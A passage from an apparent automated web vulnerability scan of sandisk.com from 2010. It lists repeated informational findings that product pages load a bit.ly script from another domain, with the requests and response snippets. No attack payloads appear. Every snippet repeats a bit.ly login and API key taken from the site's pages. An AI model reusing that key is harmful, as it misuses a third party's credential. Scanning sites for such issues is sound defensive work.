<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.86. http://www.sandisk.com/business-solutions/flash-memory-cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/flash-memory-cards/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38737
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.87. http://www.sandisk.com/business-solutions/flash-memory-cards/compact-flash-cards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/compact-flash-cards

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/flash-memory-cards/compact-flash-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37476
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.88. http://www.sandisk.com/business-solutions/flash-memory-cards/memory-stick-pro-duo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/memory-stick-pro-duo

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/flash-memory-cards/memory-stick-pro-duo HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37227
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.89. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36650
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.90. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36558
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.91. http://www.sandisk.com/business-solutions/mobile-handset-vendors  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-handset-vendors HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38644
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.92. http://www.sandisk.com/business-solutions/mobile-handset-vendors.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-handset-vendors.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38649
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.93. http://www.sandisk.com/business-solutions/mobile-handset-vendors/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-handset-vendors/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38645
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.94. http://www.sandisk.com/business-solutions/mobile-handset-vendors/inand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/inand

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-handset-vendors/inand HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37695
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.95. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/m2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-handset-vendors/m2 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.96. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/m2.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-handset-vendors/m2.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37203
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.97. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/microsdhc

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-handset-vendors/microsdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.98. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/microsdhc.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-handset-vendors/microsdhc.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37647
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.99. http://www.sandisk.com/business-solutions/mobile-network-operators  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-network-operators HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40121
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.100. http://www.sandisk.com/business-solutions/mobile-network-operators.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-network-operators.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.101. http://www.sandisk.com/business-solutions/mobile-network-operators/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-network-operators/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40122
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.102. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators/memory-cards-

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-network-operators/memory-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38689
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.103. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators/memory-cards-.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/mobile-network-operators/memory-cards-.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38694
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.104. http://www.sandisk.com/business-solutions/sd-worm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/sd-worm HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41398
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.105. http://www.sandisk.com/business-solutions/sd-worm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/sd-worm/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41399
Content-Type: text/html; charset=utf-8
